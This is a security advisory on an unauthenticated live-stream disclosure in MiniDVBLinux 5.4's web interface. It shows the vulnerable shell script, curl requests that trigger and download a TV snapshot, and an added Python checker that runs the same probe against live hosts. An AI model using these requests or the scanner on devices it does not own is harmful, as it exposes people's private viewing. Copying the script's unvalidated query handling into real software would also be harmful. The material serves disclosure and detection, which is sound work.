MiniDVBLinux 5.4 Unauthenticated Stream Disclosure

MiniDVBLinux versions 5.4 and below suffer from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).

Packet Storm
MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability

Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application suffers from an unauthenticated live stream
disclosure when /tpl/tv_action.sh is called and generates a snapshot
in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).
The script is reachable without authentication over the web
interface on port 8008, and the grabbed image is written into the
web root, so anyone who can reach the port can first trigger the
grab and then download the frame.

--------------------------------------------------------------------
/var/www/tpl/tv_action.sh:
--------------------------
#!/bin/sh

# emits the HTTP response header (MLD web helper)
header

# JPEG quality handed to VDR's GRAB command
quality=60
# $query is the raw query string; "width=W&height=H" is rewritten to
# "W H" and appended unvalidated to the SVDRP GRAB command
svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"
# the snapshot is moved into the document root, where it is served
# to any client as /images/tv.jpg
mv -f /tmp/tv.jpg /var/www/images 2>/dev/null
--------------------------------------------------------------------

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5716
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php

24.09.2022

--

1. Generate screengrab:

 - Request:

   curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"

 - Response (the SVDRP transcript is returned in the HTTP body):

   220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8
   250 Grabbed image /tmp/tv.jpg 60
   221 mld closing connection

2. View screengrab:

 - Request:

   curl http://ip:8008/images/tv.jpg

3. Or use a browser:

 - http://ip:8008/home?site=remotecontrol
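The two-step procedure above (trigger the grab, then fetch the frame) is easy to automate into a check that tells a vulnerable host apart from one where the script is gone or gated. The following is an added example written for this page; it is not part of the Zero Science advisory or of MLD itself. It reproduces the sed rewrite of the script so the GRAB command MLD sends can be inspected, parses the SVDRP reply codes that come back in the HTTP body, and confirms that /images/tv.jpg really is a JPEG rather than an error page. The `fetch` callable is injected so the logic can be exercised against canned responses (constructed here from the transcript in the advisory); `http_fetch` is the real transport for a live host. The base URL `http://ip:8008` is a placeholder.

```python
"""Checker for the MiniDVBLinux /tpl/tv_action.sh snapshot exposure
(ZSL-2022-5716). Added example, not code from the advisory or from MLD.

Probe, as in the advisory:
  1. GET /tpl/tv_action.sh[?width=W&height=H]  -> SVDRP transcript in body
  2. GET /images/tv.jpg                        -> the grabbed frame
"""
import re
import sys
from typing import Callable, Dict, List, Tuple

Fetch = Callable[[str], Tuple[int, bytes]]  # url -> (HTTP status, body)

SVDRP_GRABBED = 250          # VDR reply code for a successful GRAB
JPEG_MAGIC = b"\xff\xd8\xff"  # SOI marker every JPEG starts with


def build_grab_command(query: str, quality: int = 60,
                       path: str = "/tmp/tv.jpg") -> str:
    """Mirror what tv_action.sh hands to svdrpsend.sh.

    The script pipes $query through
        sed "s/width=\\(.*\\)&height=\\(.*\\)/\\1 \\2/g"
    so 'width=640&height=360' becomes '640 360'; an empty query yields
    a GRAB with no size, which VDR treats as full frame size.
    """
    size = re.sub(r"width=(.*)&height=(.*)", r"\1 \2", query)
    return f"GRAB {path} {quality} {size}".rstrip()


def parse_svdrp_codes(body: bytes) -> List[int]:
    """Extract the three-digit SVDRP reply codes from a transcript."""
    codes = []
    for line in body.decode("utf-8", "replace").splitlines():
        m = re.match(r"^(\d{3})[ -]", line)
        if m:
            codes.append(int(m.group(1)))
    return codes


def check_snapshot_exposure(base_url: str, fetch: Fetch) -> Dict[str, bool]:
    """Return {'grab_ok': ..., 'image_exposed': ...} for one host."""
    status, body = fetch(f"{base_url}/tpl/tv_action.sh")
    grab_ok = status == 200 and SVDRP_GRABBED in parse_svdrp_codes(body)
    result = {"grab_ok": grab_ok, "image_exposed": False}
    if grab_ok:
        status, img = fetch(f"{base_url}/images/tv.jpg")
        # an auth redirect or HTML error page will not start with SOI
        result["image_exposed"] = status == 200 and img.startswith(JPEG_MAGIC)
    return result


def http_fetch(url: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """Real transport for a live host (stdlib only)."""
    import urllib.error
    import urllib.request
    req = urllib.request.Request(url, headers={"Accept": "*/*"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read()


# Constructed responses modelled on the advisory transcript (not captured
# from a real device); the JPEG body is a truncated header, enough for
# the magic-byte check.
CANNED: Dict[str, Tuple[int, bytes]] = {
    "http://ip:8008/tpl/tv_action.sh": (200,
        b"220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8\r\n"
        b"250 Grabbed image /tmp/tv.jpg 60\r\n"
        b"221 mld closing connection\r\n"),
    "http://ip:8008/images/tv.jpg": (200, b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"),
}


def canned_fetch(url: str) -> Tuple[int, bytes]:
    return CANNED.get(url, (404, b""))


if __name__ == "__main__":
    # python3 check_mld.py http://192.0.2.10:8008   (live)
    # python3 check_mld.py                          (canned demo)
    if len(sys.argv) > 1:
        print(check_snapshot_exposure(sys.argv[1].rstrip("/"), http_fetch))
    else:
        print(build_grab_command("width=640&height=360"))
        print(check_snapshot_exposure("http://ip:8008", canned_fetch))
```

Checking the JPEG magic bytes rather than just the status code matters on this kind of embedded web UI: a firmware that adds a login in front of the image path typically answers 200 with an HTML login page, which a naive "is /images/tv.jpg reachable" probe would report as still vulnerable.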
